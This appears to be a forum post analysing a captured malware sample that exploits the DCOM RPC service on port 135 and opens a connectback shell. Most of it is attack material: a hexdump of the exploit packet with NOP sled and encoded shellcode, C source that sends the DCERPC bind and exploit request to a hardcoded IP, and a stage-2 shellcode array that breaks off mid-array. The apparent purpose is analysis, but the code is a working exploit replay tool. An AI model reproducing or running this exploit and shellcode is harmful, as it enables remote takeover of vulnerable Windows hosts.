This problem is resolved.
Port 135
Exploits DCOM
This sample exploits DCOM and uses a connectback shell.
The IP and port to connect back to are known, and we have the decryption for them.
The problem is:
right after connecting, we recv() 380 bytes and have to send a 4-byte reply.
If this reply is correct, we get the binary.
The code that opens the connectback shell:
=------------------[ hexdump(0x1bb87300 , 0x0000068a) ]-------------------=
0x0000 05 00 00 03 10 00 00 00 8a 06 00 00 00 00 00 00 ........ ........
0x0010 72 06 00 00 00 00 00 00 05 00 01 00 00 00 00 00 r....... ........
0x0020 00 00 00 00 58 7d 75 75 40 eb c6 47 bc 71 4e a7 ....X}uu @..G.qN.
0x0030 1c d0 b5 97 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
0x0040 00 00 00 00 00 00 00 00 00 00 09 00 00 03 00 00 ........ ........
0x0050 00 00 00 00 00 03 00 00 5c 00 5c 00 90 90 90 90 ........ \.\.....
0x0060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0070 90 90 90 90 90 90 90 90 90 90 90 90 eb 10 eb 19 ........ ........
0x0080 9f 75 18 00 23 37 f3 77 eb e0 fd 7f 90 90 90 90 .u..#7.w ........
0x0090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x00a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x00b0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x00c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x00d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x00e0 90 90 90 90 eb 04 ff ff ff ff 90 90 90 90 90 90 ........ ........
0x00f0 90 90 eb 04 eb 04 90 90 90 90 eb 04 ff ff ff ff ........ ........
0x0100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0110 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0140 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0150 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0160 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0170 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0180 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0190 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x01a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x01b0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x01c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x01d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x01e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x01f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0200 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0210 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0220 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0230 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0240 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0250 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0260 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0270 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0280 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0290 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x02a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x02b0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x02c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x02d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x02e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x02f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0300 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0310 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0320 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0330 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0340 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0350 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0360 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........
0x0370 90 90 90 90 90 90 90 eb 15 b9 8b e6 13 41 81 f1 ........ .....A..
0x0380 d8 e7 13 41 5e 80 74 31 ff a2 e2 f9 eb 05 e8 e6 ...A^.t1 ........
0x0390 ff ff ff 91 79 c6 29 e1 92 29 e2 ae 29 d2 be 0f ....y.). .)..)...
0x03a0 29 e2 aa f1 f1 ca 91 90 a2 a2 ca d5 d1 90 fd ca )....... ........
0x03b0 d0 d6 a2 a2 ca cf d1 d4 c1 4a 96 a2 a2 a2 a3 a2 ........ .J......
0x03c0 a2 a2 97 c0 aa 74 d6 81 82 36 62 3b 6b 68 1b fe .....t.. .6b;kh..
0x03d0 b7 cb 1b e2 54 e2 75 a0 11 af 27 5b ef 66 3e b8 ....T.u. ..'[.f>.
0x03e0 a6 ba 21 a3 71 b8 62 a0 b1 a5 22 96 a1 a5 16 28 ..!.q.b. .."....(
0x03f0 9b 8a ff c8 a0 f9 29 5a f1 f1 29 f5 9e 29 f6 98 ......)Z ..)..)..
0x0400 da a1 75 f0 29 f0 82 a1 75 91 79 e1 29 96 38 a1 ..u.)... u.y.).8.
0x0410 55 91 6b 0e 90 6a 63 63 a7 0e 26 62 d7 54 29 d7 U.k..jcc ..&b.T).
0x0420 a2 89 ee 17 a2 d7 46 25 96 86 29 f4 86 a1 75 c4 ......F% ..)...u.
0x0430 29 ae f8 29 f4 be a1 75 29 a6 28 a1 65 fc 2b e6 )..)...u ).(.e.+.
0x0440 17 a2 5d e7 a2 f9 e9 d7 12 f9 21 61 a0 f6 5d f7 ..]..... ..!a..].
0x0450 aa 21 66 aa 27 62 d7 3c 16 a0 89 42 28 66 f6 f2 .!f.'b.< ...B(f..
0x0460 5d f7 be f2 f2 ca f6 10 17 bc ca a0 a2 41 8d 29 ]....... .....A.)
0x0470 5e f2 c8 a3 c8 a0 5d f7 82 29 7a c8 b2 f5 f1 5d ^.....]. .)z....]
0x0480 f7 86 27 62 d7 fb 65 e7 a2 a1 a2 a2 a2 f2 c8 a6 ..'b..e. ........
0x0490 f7 f1 5d f7 8e 29 56 65 e7 a2 d5 c0 a2 a2 ca c7 ..]..)Ve ........
0x04a0 da c7 a2 ca d6 d6 d6 8c 29 5e f7 f5 5d f7 ae 2b ........ )^..]..+
0x04b0 e7 a2 c8 a2 ca a2 a0 a2 a2 f4 f1 5d f7 8a 27 62 ........ ...]..'b
0x04c0 d6 b3 da b9 5d d7 a2 f2 c8 a3 f4 5d f7 b2 21 66 ....]... ...]..!f
0x04d0 b2 49 7d 5d d7 a2 5d f7 b6 f2 f6 f5 5d f7 ba f1 .I}]..]. ....]...
0x04e0 5d f7 92 5d f7 a6 75 75 75 75 75 75 75 75 75 75 ]..]..uu uuuuuuuu
0x04f0 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x0500 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x0510 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x0520 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x0530 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x0540 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x0550 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x0560 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x0570 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x0580 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x0590 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x05a0 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x05b0 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x05c0 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x05d0 75 75 8b 45 30 05 24 fb ff ff ff e0 eb f4 75 75 uu.E0.$. ......uu
0x05e0 0b 0b 1b 00 75 75 75 75 75 75 75 75 75 75 75 75 ....uuuu uuuuuuuu
0x05f0 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x0600 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x0610 75 75 75 75 75 75 75 75 eb 06 75 75 59 1c 00 01 uuuuuuuu ..uuY...
0x0620 8b 44 24 fc 05 e0 fa ff ff ff e0 75 75 75 75 75 .D$..... ...uuuuu
0x0630 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 75 uuuuuuuu uuuuuuuu
0x0640 75 75 75 75 75 75 75 75 75 75 75 75 75 75 5c 00 uuuuuuuu uuuuuu\.
0x0650 41 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 A....... ........
0x0660 00 00 00 00 01 00 00 00 68 1c 09 00 01 00 00 00 ........ h.......
0x0670 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 ........ .......F
0x0680 01 00 00 00 01 00 00 00 07 00                   ........ ..
=-------------------------------------------------------------------------=
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <sys/select.h>
#include <ctype.h>

#define HOSTNAME "123.23.23.23"
#define PORT 135

/* DCERPC bind (packet type 0x0b) */
unsigned char unknown_req1[] = {
 0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0xd0,0x16,0xd0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00
,0xb8,0x4a,0x9f,0x4d,0x1c,0x7d,0xcf,0x11,0x86,0x1e,0x00,0x20,0xaf,0x6e,0x7c,0x57
,0x00,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00
,0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00 };

/* DCERPC request (packet type 0x00) carrying the payload */
unsigned char unknown_req2[] = {
 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x8a,0x06,0x00,0x00,0x00,0x00,0x00,0x00
,0x72,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x58,0x7d,0x75,0x75,0x40,0xeb,0xc6,0x47,0xbc,0x71,0x4e,0xa7
,0x1c,0xd0,0xb5,0x97,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x09,0x00,0x00,0x03,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x5c,0x00,0x5c,0x00,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,0x10,0xeb,0x19
,0x9f,0x75,0x18,0x00,0x23,0x37,0xf3,0x77,0xeb,0xe0,0xfd,0x7f,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0xeb,0x04,0xff,0xff,0xff,0xff,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0xeb,0x04,0xeb,0x04,0x90,0x90,0x90,0x90,0xeb,0x04,0xff,0xff,0xff,0xff
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,0x15,0xb9,0x8b,0xe6,0x13,0x41,0x81
,0xf1,0x39,0xe6,0x13,0x41,0x5e,0x80,0x74,0x31,0xff,0x17,0xe2,0xf9,0xeb,0x05,0xe8
,0xe6,0xff,0xff,0xff,0x24,0xcc,0x73,0x9c,0x54,0x27,0x9c,0x57,0x1b,0x9c,0x67,0x0b
,0xba,0x9c,0x6f,0x1f,0xff,0x52,0x17,0x17,0x17,0x44,0x41,0x9c,0x48,0x2b,0x9c,0x4b
,0x2c,0x6f,0x14,0xc8,0x44,0x9c,0x4c,0x37,0x14,0xc8,0x44,0x94,0xd4,0x13,0x9c,0x24
,0x14,0xe0,0x24,0xde,0xbb,0x25,0xdf,0xd6,0xd6,0x12,0x93,0xd7,0x62,0xe1,0x3c,0xdd
,0x62,0xfe,0x4f,0x3c,0xcf,0xc6,0xfc,0x49,0x14,0x49,0x33,0x14,0xc8,0x71,0x9c,0x1c
,0x9c,0x49,0x0b,0x14,0xc8,0x9c,0x13,0x9c,0x14,0xd0,0x49,0x4c,0xe8,0xf7,0x49,0x7f
,0x24,0x25,0x17,0x17,0x7f,0x60,0x64,0x25,0x48,0x43,0xad,0x85,0x79,0x13,0x93,0xe8
,0xc1,0x9c,0xef,0x96,0xfb,0x17,0x15,0x17,0x17,0x9c,0xfb,0x44,0x7d,0x16,0x7d,0x15
,0xad,0x94,0x44,0x94,0x17,0xe8,0xc1,0x44,0x44,0x7f,0x29,0x38,0xce,0xe9,0x7f,0x15
,0x17,0x2b,0x0e,0x9c,0xc3,0x9c,0xcf,0x7d,0x07,0x45,0x44,0xad,0x74,0x27,0x77,0x4d
,0xe8,0xc1,0x47,0xa3,0x15,0x47,0x42,0x44,0xad,0x17,0x4f,0x77,0xf5,0xe8,0xc1,0xa8
,0xbb,0xbb,0x11,0x92,0xe8,0xf2,0x6c,0x79,0x73,0x65,0x7a,0x6c,0x64,0x6c,0x6a,0x64
,0x71,0x66,0x70,0x6c,0x62,0x65,0x7a,0x71,0x79,0x71,0x76,0x76,0x79,0x6a,0x71,0x77
,0x65,0x63,0x7a,0x75,0x6f,0x64,0x62,0x67,0x69,0x69,0x68,0x78,0x65,0x71,0x7a,0x6b
,0x75,0x6f,0x75,0x67,0x76,0x72,0x66,0x67,0x6b,0x75,0x6f,0x6d,0x6c,0x79,0x79,0x67
,0x77,0x78,0x6f,0x6d,0x61,0x6c,0x72,0x6c,0x73,0x70,0x6a,0x63,0x64,0x73,0x6c,0x6c
,0x73,0x69,0x67,0x67,0x6b,0x66,0x73,0x71,0x6c,0x62,0x6a,0x6c,0x71,0x63,0x76,0x73
,0x6e,0x78,0x6f,0x71,0x72,0x78,0x6f,0x76,0x63,0x73,0x75,0x70,0x70,0x6e,0x62,0x61
,0x76,0x72,0x70,0x66,0x63,0x61,0x6a,0x66,0x67,0x76,0x68,0x76,0x71,0x7a,0x63,0x62
,0x7a,0x63,0x66,0x65,0x78,0x6f,0x6e,0x68,0x68,0x61,0x70,0x66,0x6a,0x78,0x67,0x72
,0x6d,0x68,0x70,0x6d,0x75,0x6c,0x75,0x62,0x6d,0x71,0x7a,0x72,0x6d,0x76,0x63,0x76
,0x73,0x70,0x6a,0x79,0x68,0x61,0x62,0x63,0x76,0x76,0x71,0x68,0x78,0x63,0x6b,0x6f
,0x7a,0x6a,0x78,0x68,0x70,0x6f,0x76,0x63,0x66,0x74,0x61,0x74,0x71,0x61,0x66,0x62
,0x74,0x68,0x67,0x75,0x61,0x74,0x72,0x75,0x6a,0x68,0x75,0x63,0x69,0x72,0x62,0x6b
,0x6a,0x67,0x64,0x70,0x6c,0x78,0x67,0x61,0x71,0x66,0x7a,0x67,0x67,0x71,0x63,0x6a
,0x62,0x69,0x79,0x6a,0x71,0x76,0x77,0x66,0x67,0x7a,0x74,0x69,0x72,0x77,0x6f,0x63
,0x79,0x7a,0x8b,0x45,0x30,0x05,0x24,0xfb,0xff,0xff,0xff,0xe0,0xeb,0xf4,0x70,0x75
,0x0b,0x0b,0x1b,0x00,0x6b,0x6a,0x69,0x68,0x74,0x70,0x6f,0x66,0x68,0x6c,0x65,0x65
,0x77,0x72,0x61,0x79,0x78,0x6b,0x61,0x76,0x78,0x77,0x64,0x71,0x61,0x71,0x7a,0x76
,0x77,0x67,0x62,0x77,0x65,0x67,0x6f,0x66,0x74,0x74,0x73,0x6d,0x77,0x6f,0x75,0x6e
,0x62,0x6d,0x6f,0x64,0x73,0x6d,0x78,0x6c,0xeb,0x06,0x6d,0x64,0x59,0x1c,0x00,0x01
,0x8b,0x44,0x24,0xfc,0x05,0xe0,0xfa,0xff,0xff,0xff,0xe0,0x6d,0x75,0x6a,0x64,0x6b
,0x75,0x63,0x69,0x77,0x65,0x63,0x74,0x61,0x75,0x64,0x70,0x73,0x66,0x68,0x67,0x69
,0x62,0x67,0x63,0x75,0x72,0x66,0x6a,0x6a,0x6e,0x6e,0x78,0x72,0x78,0x66,0x5c,0x00
,0x41,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x68,0x1c,0x09,0x00,0x01,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46
,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x07,0x00 };

typedef unsigned int uint;
typedef unsigned char byte;

/* print a buffer in the hexdump layout used above */
void hexdump(byte *data, uint len)
{
    char conv[] = "0123456789abcdef";

    printf("=------------------[ hexdump(0x%08lx , 0x%08x) ]-------------------=\n", (unsigned long)data, len);
    for (unsigned int i = 0; i < len; i += 0x10) {
        printf("0x%04x ", i);
        for (unsigned int j = 0; j < 0x10; j++) {
            if (i + j < len)
                printf("%c%c ", conv[(data[i + j] & 0xFF) >> 4], conv[data[i + j] & 0x0F]);
            else
                printf("   ");
            if (j == 7)
                printf(" ");
        }
        printf(" ");
        for (unsigned int j = 0; j < 0x10; j++) {
            if (i + j < len)
                printf("%c", isprint(data[i + j]) ? data[i + j] : '.');
            else
                printf(" ");
            if (j == 7)
                printf(" ");
        }
        printf("\n");
    }
    printf("=-------------------------------------------------------------------------=\n");
}

/* wait up to 10 s for data on the socket and dump whatever arrives;
   the timeout argument is not used (kept for the callers above) */
char *getreply(int sockfd, int timeout)
{
    char rb[1500];
    fd_set fdreadme;
    int i;
    struct timeval tv;

    (void)timeout;
    printf("[*] Trying to receive a reply \n");
    tv.tv_sec = 10;
    tv.tv_usec = 0;
    FD_ZERO(&fdreadme);
    FD_SET(sockfd, &fdreadme);
    FD_SET(0, &fdreadme);
    if (select(FD_SETSIZE, &fdreadme, NULL, NULL, &tv) < 0) {
        return NULL;
    }
    if (FD_ISSET(sockfd, &fdreadme)) {
        if ((i = recv(sockfd, rb, sizeof(rb), 0)) < 0) {
            printf("[-] Connection lost..\n");
            exit(1);
        } else {
            printf("\t[+] got %i bytes of data \n", i);
            hexdump((byte *)rb, i);
        }
    }
    return NULL;
}

int senddata(int sockfd, unsigned char *data, int len)
{
    int sended = 0;

    if ((sended = send(sockfd, data, len, 0)) != len) {
        printf("\t[-] Could not send complete data (%i < %i)\n", sended, len);
    } else {
        printf("\t[+] Sended Request \n");
    }
    return sended;
}

int main(void)
{
    struct hostent *he;
    struct sockaddr_in their_addr;
    int sockfd = -1;

    printf("[*] Resolving Hostname %s \n", HOSTNAME);
    if ((he = gethostbyname(HOSTNAME)) == NULL) {
        printf("\t[-] gethostbyname: Couldnt resolve hostname\n");
        exit(1);
    }
    printf("\t[+] Done. (%s) \n", inet_ntoa(*((struct in_addr *)he->h_addr)));

    printf("[*] Connecting Server \n");
    their_addr.sin_family = AF_INET;
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    their_addr.sin_port = htons(PORT);
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("\t[-] Socket failed");
        return 0;
    } else {
        printf("\t[+] created Socket \n");
    }
    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
        perror("\t[-] Connect failed");
        return 0;
    } else {
        printf("\t[+] Connected ...\n");
    }

    printf("[*] Sending Request #1 (%zu bytes)\n", sizeof(unknown_req1));
    senddata(sockfd, unknown_req1, sizeof(unknown_req1));
    getreply(sockfd, 0);
    printf("[*] Sending Request #2 (%zu bytes)\n", sizeof(unknown_req2));
    senddata(sockfd, unknown_req2, sizeof(unknown_req2));
    getreply(sockfd, 0);

    printf("[*] Closing Socket \n");
    printf("\t[+] done (%i)\n", close(sockfd));
    return 0;
}
/* stage 2 (380 bytes), received over the connectback connection */
unsigned char unknown_req3[] = {
 0x83,0xec,0x20,0x8b,0xec,0x89,0x5d,0x04,0x89,0x7d,0x00,0x81,0xec,0x00,0x02,0x00
,0x00,0x89,0x65,0x14,0x33,0xdb,0x64,0x8b,0x43,0x30,0x8b,0x40,0x0c,0x8b,0x70,0x1c
,0xad,0x8b,0x78,0x08,0x89,0x7d,0x08,0xe8,0x45,0x00,0x00,0x00,0x53,0x56,0x8b,0x5f
,0x3c,0x8b,0x5c,0x3b,0x78,0x03,0xdf,0x53,0x8b,0x5b,0x20,0x03,0xdf,0x53,0x83,0xc3
,0x04,0x8b,0x33,0x03,0xf7,0x33,0xc9,0xac,0x32,0xc8,0xc1,0xc1,0x05,0x84,0xc0,0x75
